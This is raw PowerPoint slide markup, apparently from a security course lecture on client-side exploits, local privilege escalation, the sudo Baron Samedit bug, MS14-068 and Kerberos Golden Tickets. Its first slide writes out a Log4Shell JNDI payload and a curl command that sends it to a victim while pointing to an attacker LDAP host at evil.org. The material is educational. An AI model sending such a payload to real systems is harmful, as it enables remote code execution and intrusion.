              <a:t>User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl -H "User-Agent: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x}" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Oh and have a running malicious LDAP server listening at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1788616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5117A7-1400-DE4A-B776-C8CF9FC8B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6646164" cy="6858598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C91D2129-5DC2-BA46-BF08-F10A55C0CE69}"/>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278272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EF77-9169-8F41-ABA9-6A4785AA5447}"/>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2E3B006D-AE2B-6840-8501-A16E75B7E1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4638"/>
            <a:ext cx="9143806" cy="6144768"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4266131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Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Client-side exploits wait for a client application to access an attacker-supplied response/file, then deliver an exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>As servers became better protected (firewalls, IDS/IPS, better coding practices) the client-side became a large focus for attackers and exploit developers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2948908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characteristics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Methods are fluid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Best attackers are pragmatic opportunists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Attackers may jump around between steps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2919282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Notable Client-side exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Web browsers (IE, Firefox, Chrome)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Media players (Windows Media Player)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Document readers (Acrobat)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Run-time environments (Java)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>E-mail clients (Outlook)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" strike="sngStrike" dirty="0"/>
              <a:t>Web add on tools (Flash)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2402213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A541-7327-FC44-BBC9-CF50BBD03AF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What could possibly go wrong?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F28A578D-875A-F14A-8281-6AB3BDA9F9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245" y="1417638"/>
            <a:ext cx="8059910" cy="4873434"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3861164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privilege escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Local privilege escalation attacks require prior access to target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Allow jump from limited privilege account to one with more privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>root/UID 0 in *nix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Administrator or SYSTEM in Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Many vendors do NOT rate these vulnerabilities as “Critical” so they are often less likely to be patched quickly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3378337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Local privilege escalation attack types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Types of local privilege escalation attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Race Conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Attacks against the kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Local exploit of high privilege program or service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Tools which include these sorts of attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Against Windows: Metasploit Meterpreter “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Against Linux: various exploits on poor system configuration or exploits against specific tools/features (ex dirtyc0w, Baron </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Samedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3127545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20886-ABD1-8344-8C1D-8BDDE0535EBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
              <a:t>CVE-2021-3156 (Baron </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0" err="1"/>
              <a:t>Samedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B30A4A4-8C31-764F-BDA9-05026592E922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Heap overflow vulnerability in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Any user can gain root privileges by using a default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>This lasted for almost 10 years (July 2011 – Jan 2021) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> versions 1.8.2 to 1.8.31p2 and from 1.9.0 to 1.9.5p1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3051568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830"/>
            <a:ext cx="7620000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS14-068</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>“Vulnerability in Kerberos Could Allow Elevation of Privilege”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Windows Kerberos Key Distribution Center could allow an attacker to elevate privileges to those of a Domain Administrator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>aka “create a Golden Ticket”  (more on this soon)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-068</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6526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Golden Tickets?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Diving deep into Windows Domain authentication, at the core is DNS, LDAP, and Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Kerberos when you successful authenticate you are given a ticket granting ticket to show you are authorized (contains session key, expiration date, usually IP address to ID you)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> you can create a custom ticket (that lasts up to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>10 years</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limited to Admin rights on the current domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doesn’t work across domains in Forest unless in EA (extension attributes) domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2289724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Visio-GoldenTicket-Comms-1024x511.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-13123" b="-13123"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="770506"/>
            <a:ext cx="8439664" cy="5316988"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1330565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Golden Tickets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://adsecurity.org/?p=1640</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.blackhat.com/docs/us-15/materials/us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
